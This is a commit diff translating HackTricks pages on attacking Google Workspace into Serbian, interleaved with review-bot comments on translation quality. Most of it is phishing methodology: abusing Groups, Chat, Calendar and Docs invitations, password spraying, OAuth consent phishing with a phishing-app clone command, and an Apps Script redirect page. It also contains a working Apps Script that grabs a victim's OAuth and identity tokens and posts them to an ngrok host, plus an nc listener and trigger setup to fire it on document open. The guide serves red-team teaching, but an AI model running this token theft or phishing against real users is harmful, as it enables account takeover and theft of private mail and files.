Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Translator
2024-12-31 19:00:04 +00:00
parent 7770a50092
commit 10e2881a9b
244 changed files with 8499 additions and 11339 deletions
@@ -6,7 +6,7 @@
### Google Platforms and OAuth Apps Phishing
Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
Proverite kako možete koristiti različite Google platforme kao što su Drive, Chat, Groups... da pošaljete žrtvi phishing link i kako da izvršite Google OAuth Phishing u:
{{#ref}}
gws-google-platforms-phishing/
@@ -14,11 +14,11 @@ gws-google-platforms-phishing/
### Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
Da biste testirali lozinke sa svim emailovima koje ste pronašli (ili koje ste generisali na osnovu obrazaca imena emaila koje ste možda otkrili), možete koristiti alat kao što je [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (iako izgleda da nije održavan) koji će koristiti AWS lambde za promenu IP adrese.
## Post-Exploitation
If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
Ako ste kompromitovali neke kredencijale ili sesiju korisnika, možete izvršiti nekoliko akcija da pristupite potencijalno osetljivim informacijama korisnika i pokušate da eskalirate privilegije:
{{#ref}}
gws-post-exploitation.md
@@ -26,17 +26,17 @@ gws-post-exploitation.md
### GWS <-->GCP Pivoting
Read more about the different techniques to pivot between GWS and GCP in:
Pročitajte više o različitim tehnikama za pivotiranje između GWS i GCP u:
{{#ref}}
../gcp-security/gcp-to-workspace-pivoting/
{{#endref}}
## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
- **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC.
- **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
- **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
- **GCPW (Google Credential Provider for Windows)**: Ovo je jedinstveno prijavljivanje koje Google Workspaces pruža tako da korisnici mogu da se prijave na svojim Windows PC-ima koristeći **svoje Workspace kredencijale**. Štaviše, ovo će **čuvati tokene za pristup Google Workspace-u** na nekim mestima na PC-u.
- **GCDS (Google Cloud Directory Sync)**: Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa iz aktivnog direktorijuma sa vašim Workspace-om**. Alat zahteva **kredencijale superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da, može biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
- **Admin Directory Sync**: Omogućava vam da sinhronizujete korisnike iz AD i EntraID u serverless procesu sa [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
{{#ref}}
gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
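Review bot: the heading `## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)` appears with identical text on both sides of this hunk, so the change to that line is whitespace-only (trailing space or indentation) and should be dropped from a translation commit to keep the diff to real content. The three bullets below it are translated consistently, and the source's `Google CLoud DIrectory Sync` capitalisation typo is correctly normalised to `Google Cloud Directory Sync` on the target side; it would be worth fixing the same typo in the English source.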
@@ -44,7 +44,7 @@ gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
## Persistence
If you have compromised some credentials or the session of the user check these options to maintain persistence over it:
Ako ste kompromitovali neke kredencijale ili sesiju korisnika, proverite ove opcije za održavanje postojanosti:
{{#ref}}
gws-persistence.md
@@ -52,26 +52,22 @@ gws-persistence.md
## Account Compromised Recovery
- Log out of all sessions
- Change user password
- Generate new 2FA backup codes
- Remove App passwords
- Remove OAuth apps
- Remove 2FA devices
- Remove email forwarders
- Remove emails filters
- Remove recovery email/phones
- Removed malicious synced smartphones
- Remove bad Android Apps
- Remove bad account delegations
- Odjavite se iz svih sesija
- Promenite lozinku korisnika
- Generišite nove 2FA rezervne kodove
- Uklonite App lozinke
- Uklonite OAuth aplikacije
- Uklonite 2FA uređaje
- Uklonite email prosledjivače
- Uklonite email filtre
- Uklonite email/telefone za oporavak
- Uklonite zlonamerne sinhronizovane pametne telefone
- Uklonite loše Android aplikacije
- Uklonite loše delegacije naloga
## References
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
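Review bot: the title of the cited talk is translated in the last reference (`OK Google, Kako da Red Team GSuite?`), which breaks look-up of the referenced video; keep titles of cited talks verbatim and translate only the connective, e.g. `- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, How do I Red Team GSuite?`. The recovery checklist itself reads well in the target language and correctly normalises the source's inconsistent `Removed malicious synced smartphones` to the imperative `Uklonite`.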
@@ -10,70 +10,68 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodo
## Google Groups Phishing
Apparently, by default, in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will look **legit** and people might click on the link.
Naime, po default-u, članovi u workspace-u [**mogu kreirati grupe**](https://groups.google.com/all-groups) **i pozivati ljude u njih**. Zatim možete izmeniti email koji će biti poslat korisniku **dodajući neke linkove.** **Email će doći sa google adrese**, tako da će izgledati **legitimno** i ljudi bi mogli kliknuti na link.
It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
Takođe je moguće postaviti **FROM** adresu kao **Google grupu email** da se pošalje **više emailova korisnicima unutar grupe**, kao na sledećoj slici gde je grupa **`google--support@googlegroups.com`** kreirana i **email je poslat svim članovima** grupe (koji su dodati bez ikakvog pristanka)
<figure><img src="../../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
## Google Chat Phishing
You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
Možda ćete moći da **započnete chat** sa osobom samo imajući njihovu email adresu ili da pošaljete **pozivnicu za razgovor**. Štaviše, moguće je **kreirati Space** koji može imati bilo koje ime (npr. "Google Support") i **pozvati** članove u njega. Ako prihvate, mogli bi pomisliti da razgovaraju sa Google podrškom:
<figure><img src="../../../images/image (6).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> **In my testing however the invited members didn't even receive an invitation.**
> **Međutim, u mom testiranju pozvani članovi nisu čak ni primili pozivnicu.**
You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
Možete proveriti kako je to funkcionisalo u prošlosti na: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
## Google Doc Phishing
In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
U prošlosti je bilo moguće kreirati **naizgled legitimni dokument** i u komentaru **spomenuti neku email adresu (kao što je @user@gmail.com)**. Google **je poslao email toj email adresi** obaveštavajući da su spomenuti u dokumentu.\
Danas, to ne funkcioniše, ali ako **dajte žrtvi pristup dokumentu** Google će poslati email koji to ukazuje. Ovo je poruka koja se pojavljuje kada spomenete nekoga:
<figure><img src="../../../images/image (7).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
> Žrtve mogu imati mehanizam zaštite koji ne dozvoljava da emailovi koji ukazuju da je eksterni dokument podeljen sa njima stignu do njihove email adrese.
## Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event look legit and **put a comment and a title indicating that they need to read something** (with the **phishing link**).
Možete **kreirati kalendarski događaj** i dodati koliko god email adresa kompanije koju napadate imate. Zakazujte ovaj kalendarski događaj u **5 ili 15 minuta** od trenutnog vremena. Neka događaj izgleda legitimno i **stavite komentar i naslov koji ukazuje da treba da pročitaju nešto** (sa **phishing linkom**).
This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
Ovo je upozorenje koje će se pojaviti u pretraživaču sa naslovom sastanka "Otpustiti ljude", tako da biste mogli postaviti naslov koji više liči na phishing (i čak promeniti ime povezano sa vašom email adresom).
<figure><img src="../../../images/image (8).png" alt=""><figcaption></figcaption></figure>
To make it look less suspicious:
Da bi izgledalo manje sumnjivo:
- Set it up so that **receivers cannot see the other people invited**
- Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
- Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
- Postavite tako da **primalaci ne mogu videti druge ljude pozvane**
- **NE šaljite emailove koji obaveštavaju o događaju**. Tada će ljudi samo videti svoje upozorenje o sastanku za 5 minuta i da treba da pročitaju taj link.
- Naime, koristeći API možete postaviti na **True** da su **ljudi** **prihvatili** događaj i čak kreirati **komentare u njihovo ime**.
## App Scripts Redirect Phishing
It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
Moguće je kreirati skriptu na [https://script.google.com/](https://script.google.com/) i **izložiti je kao web aplikaciju dostupnu svima** koja će koristiti legitimnu domenu **`script.google.com`**.\
Sa nekim kodom poput sledećeg, napadač bi mogao napraviti da skripta učita proizvoljan sadržaj na ovoj stranici bez prestanka pristupajući domeni:
```javascript
function doGet() {
return HtmlService.createHtmlOutput(
'<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">'
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
return HtmlService.createHtmlOutput(
'<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">'
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
}
```
For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
<figure><img src="../../../images/image (4) (1).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Note that a warning will appear as the content is loaded inside an iframe.
> Imajte na umu da će se pojaviti upozorenje dok se sadržaj učitava unutar iframe-a.
## App Scripts OAuth Phishing
It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
Moguće je kreirati App Scripts povezane sa dokumentima kako bi se pokušao dobiti pristup žrtvinom OAuth tokenu, za više informacija pogledajte:
{{#ref}}
gws-app-scripts.md
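Review bot: the meeting title `"Firing People"` is translated to `"Otpustiti ljude"` although it quotes the literal title visible in the referenced screenshot (`image (8).png`); quoted UI strings that match an image should stay verbatim so the text and the figure agree. The `doGet()` code block is also re-emitted line for line with identical content on both sides, which indicates a whitespace-only change to the code (the indentation inside the function appears to have been dropped); code blocks should be carried over unchanged in a translation commit. Minor wording: `bez prestanka pristupajući domeni` is an awkward rendering of `without stop accessing the domain`; `a da se pritom ne napušta domen` reads more naturally.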
@@ -81,89 +79,83 @@ gws-app-scripts.md
## OAuth Apps Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
Bilo koja od prethodnih tehnika može se koristiti da se korisnik natera da pristupi **Google OAuth aplikaciji** koja će **tražiti** od korisnika neki **pristup**. Ako korisnik **veruje** **izvoru**, može **verovati** i **aplikaciji** (čak i ako traži visoke privilegije).
> [!NOTE]
> Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
> Imajte na umu da Google prikazuje ružnu poruku upozorenja da je aplikacija nepouzdana u nekoliko slučajeva, a Workspace administratori čak mogu sprečiti ljude da prihvate OAuth aplikacije.
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
**Google** omogućava kreiranje aplikacija koje mogu **interagovati u ime korisnika** sa nekoliko **Google servisa**: Gmail, Drive, GCP...
When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\
When a **user** wants to **use** that **application**, they will be **prompted** to **accept** that the application will have access to their data specified in the scopes.
Kada se kreira aplikacija da **deluje u ime drugih korisnika**, programer treba da kreira **OAuth aplikaciju unutar GCP** i da označi opsege (dozvole) koje aplikacija treba da pristupi podacima korisnika.\
Kada **korisnik** želi da **koristi** tu **aplikaciju**, biće **upitan** da **prihvati** da će aplikacija imati pristup njihovim podacima navedenim u opsezima.
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. However, in organizations accounts, there are ways to prevent this from happening.
Ovo je veoma primamljiv način da se **phish** netehnički korisnici u korišćenju **aplikacija koje pristupaju osetljivim informacijama** jer možda ne razumeju posledice. Međutim, u organizacijama postoje načini da se to spreči.
### Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions they are giving the application on their behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making it more difficult** for the user to grant the permissions to the app.
Kao što je pomenuto, Google će uvek prikazati **poruku korisniku da prihvati** dozvole koje daju aplikaciji u njihovo ime. Međutim, ako se aplikacija smatra **opasnom**, Google će prvo prikazati **poruku** koja ukazuje da je **opasna** i **otežava** korisniku da odobri dozvole aplikaciji.
This prompt appears in apps that:
Ova poruka se pojavljuje u aplikacijama koje:
- Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
- Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
- Koriste bilo koji opseg koji može pristupiti privatnim podacima (Gmail, Drive, GCP, BigQuery...)
- Aplikacije sa manje od 100 korisnika (aplikacije > 100 zahtevaju proces pregleda da bi prestale da prikazuju neproverenu poruku)
### Interesting Scopes
[**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
[**Ovde**](https://developers.google.com/identity/protocols/oauth2/scopes) možete pronaći listu svih Google OAuth opsega.
- **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
- **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
- **cloud-platform**: Pregledajte i upravljajte svojim podacima širom **Google Cloud Platform** servisa. Možete se pretvarati da ste korisnik u GCP.
- **admin.directory.user.readonly**: Vidite i preuzmite direktorijum GSuite vaše organizacije. Dobijate imena, telefone, URL-ove kalendara svih korisnika.
### Create an OAuth App
**Start creating an OAuth Client ID**
**Započnite kreiranje OAuth Client ID**
1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
- Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
4. **Select** the **OAuth scopes**.
- This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
- Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
1. Idite na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) i kliknite na konfiguraciju ekrana za pristanak.
2. Zatim, bićete upitani da li je **tip korisnika** **interni** (samo za ljude u vašoj organizaciji) ili **eksterni**. Izaberite onaj koji odgovara vašim potrebama
- Interni može biti zanimljiv ako ste već kompromitovali korisnika organizacije i kreirate ovu aplikaciju da biste phishingovali drugog.
3. Dajte **ime** aplikaciji, **email za podršku** (imajte na umu da možete postaviti googlegroup email da biste pokušali da se malo više anonimizujete), **logo**, **ovlašćene domene** i drugi **email** za **ažuriranja**.
4. **Izaberite** **OAuth opsege**.
- Ova stranica je podeljena na neosetljive dozvole, osetljive dozvole i ograničene dozvole. Svaki put kada dodate novu dozvolu, ona se dodaje u svoju kategoriju. U zavisnosti od traženih dozvola, različite poruke će se pojaviti korisniku ukazujući na to koliko su te dozvole osetljive.
- I **`admin.directory.user.readonly`** i **`cloud-platform`** su osetljive dozvole.
5. **Dodajte test korisnike.** Dok je status aplikacije testiranje, samo će ovi korisnici moći da pristupe aplikaciji, pa se pobrinite da **dodate email koji ćete phishingovati**.
Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
Sada hajde da **dobijemo kredencijale za web aplikaciju** koristeći **prethodno kreirani OAuth Client ID**:
1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
2. Select to **create credentials for a Web application**
3. Set needed **Javascript origins** and **redirect URIs**
- You can set in both something like **`http://localhost:8000/callback`** for testing
4. Get your application **credentials**
Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
1. Vratite se na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), ovoga puta će se pojaviti druga opcija.
2. Izaberite da **kreirate kredencijale za web aplikaciju**
3. Postavite potrebne **Javascript izvore** i **URI za preusmeravanje**
- Možete postaviti u oba nešto poput **`http://localhost:8000/callback`** za testiranje
4. Dobijte svoje aplikacione **kredencijale**
Na kraju, hajde da **pokrenemo web aplikaciju koja će koristiti kredencijale OAuth aplikacije**. Možete pronaći primer na [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
```bash
git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "<client_id>" --client-secret "<client_secret>"
```
Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
Idite na **`http://localhost:8000`**, kliknite na dugme Prijavite se sa Google-om, bićete **upitani** sa porukom poput ove:
<figure><img src="../../../images/image (333).png" alt=""><figcaption></figcaption></figure>
The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
Aplikacija će prikazati **access i refresh token** koji se mogu lako koristiti. Za više informacija o **kako koristiti ove tokene proverite**:
{{#ref}}
../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md
{{#endref}}
#### Using `glcoud`
#### Korišćenje `glcoud`
It's possible to do something using gcloud instead of the web console, check:
Moguće je uraditi nešto koristeći gcloud umesto web konzole, proverite:
{{#ref}}
../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
{{#endref}}
## References
## Reference
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../../banners/hacktricks-training.md}}
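Review bot: the heading typo `glcoud` is carried into the translation (`#### Korišćenje `glcoud``); it should read `gcloud` on the target side, and the source heading deserves the same fix. Two unchanged lines in this hunk also merit attention while the file is being edited: the clone command `git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example` is missing the `h` of `https` and will fail as written, and the last reference translates the talk title (`OK Google, Kako da Red Team GSuite?`) where cited titles should stay verbatim.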
@@ -4,236 +4,224 @@
## App Scripts
App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
App Scripts je **kod koji će se aktivirati kada korisnik sa dozvolom za uređivanje pristupi dokumentu sa kojim je povezan App Script** i nakon **prihvatanja OAuth prompta**.\
Takođe se mogu postaviti da se **izvršavaju svakog određenog vremena** od strane vlasnika App Script-a (Persistencija).
### Create App Script
### Kreirajte App Script
There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
Postoji nekoliko načina za kreiranje App Script-a, iako su najčešći **iz Google dokumenta (bilo koje vrste)** i kao **samostalni projekat**:
<details>
<summary>Create a container-bound project from Google Docs, Sheets, or Slides</summary>
<summary>Kreirajte projekat vezan za kontejner iz Google Docs, Sheets ili Slides</summary>
1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
2. Click **Extensions** > **Google Apps Script**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Otvorite Docs dokument, Sheets tabelu ili Slides prezentaciju.
2. Kliknite na **Ekstenzije** > **Google Apps Script**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project</summary>
<summary>Kreirajte samostalni projekat</summary>
To create a standalone project from Apps Script:
Da biste kreirali samostalni projekat iz Apps Script-a:
1. Go to [`script.google.com`](https://script.google.com/).
2. Click add **New Project**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Idite na [`script.google.com`](https://script.google.com/).
2. Kliknite na **Novi projekat**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project from Google Drive</summary>
<summary>Kreirajte samostalni projekat iz Google Drive-a</summary>
1. Open [Google Drive](https://drive.google.com/).
2. Click **New** > **More** > **Google Apps Script**.
1. Otvorite [Google Drive](https://drive.google.com/).
2. Kliknite na **Novi** > **Više** > **Google Apps Script**.
</details>
<details>
<summary>Create a container-bound project from Google Forms</summary>
<summary>Kreirajte projekat vezan za kontejner iz Google Forms</summary>
1. Open a form in Google Forms.
2. Click More more_vert > **Script editor**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Otvorite obrazac u Google Forms.
2. Kliknite na Više more_vert > **Editor skripti**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project using the clasp command line tool</summary>
<summary>Kreirajte samostalni projekat koristeći clasp komandnu liniju</summary>
`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
`clasp` je alat komandne linije koji vam omogućava da kreirate, povlačite/pomerate i implementirate Apps Script projekte iz terminala.
See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
Pogledajte [Vodič za komandnu liniju koristeći `clasp`](https://developers.google.com/apps-script/guides/clasp) za više detalja.
</details>
## App Script Scenario <a href="#create-using-clasp" id="create-using-clasp"></a>
## Scenarijo App Script <a href="#create-using-clasp" id="create-using-clasp"></a>
### Create Google Sheet with App Script
### Kreirajte Google Sheet sa App Script-om
Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
Započnite kreiranjem App Script-a, moja preporuka za ovaj scenario je da kreirate Google Sheet i idete na **`Ekstenzije > App Scripts`**, ovo će otvoriti **novi App Script za vas povezan sa tabelom**.
### Leak token
In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
Da biste omogućili pristup OAuth tokenu, potrebno je da kliknete na **`Servisi +` i dodate opsege kao**:
- **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
- **Gmail**: To access gmail data
- **Drive**: To access drive data
- **Google Sheets API**: So it works with the trigger
To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
- **AdminDirectory**: Pristup korisnicima i grupama u direktorijumu (ako korisnik ima dovoljno dozvola)
- **Gmail**: Da biste pristupili gmail podacima
- **Drive**: Da biste pristupili podacima sa diska
- **Google Sheets API**: Da bi radilo sa okidačem
Da biste promenili **potrebne opsege**, možete otići na podešavanja projekta i omogućiti: **`Prikaži "appsscript.json" manifest fajl u editoru`.**
```javascript
function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()
// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}
// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}
// Send data
makePostRequest(data)
// Send data
makePostRequest(data)
// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})
// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})
// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)
// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)
// To ask for drive permissions
var files = DriveApp.getFiles()
// To ask for drive permissions
var files = DriveApp.getFiles()
}
function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"
var url = "http://5.tcp.eu.ngrok.io:12027"
var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}
var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}
try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}
```
To capture the request you can just run:
Da biste uhvatili zahtev, jednostavno možete pokrenuti:
```bash
ngrok tcp 4444
nc -lv 4444 #macOS
```
Permissions requested to execute the App Script:
<figure><img src="../../../images/image (334).png" alt=""><figcaption></figcaption></figure>
> [!WARNING]
> As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
> Kada se izvrši spoljni zahtev, OAuth prompt će takođe **tražiti dozvolu za pristup spoljnim krajnjim tačkama**.
### Create Trigger
Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
Kada se aplikacija pročita, kliknite na **⏰ Triggers** da kreirate okidač. Kao **funkciju** izaberite **`getToken`**, pokreće se na implementaciji **`Head`**, u izvoru događaja izaberite **`From spreadsheet`** i tip događaja izaberite **`On open`** ili **`On edit`** (u zavisnosti od vaših potreba) i sačuvajte.
Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
Napomena: možete proveriti **izvršenja App Scripts u kartici Executions** ako želite da debagujete nešto.
### Sharing
In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
Da bi se **pokrenuo** **App Script**, žrtva treba da se poveže sa **Editor Access**.
> [!TIP]
> The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
> **Token** koji se koristi za izvršenje **App Script** biće onaj od **kreatora okidača**, čak i ako je datoteka otvorena kao Editor od strane drugih korisnika.
### Abusing Shared With Me documents
> [!CAUTION]
> If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
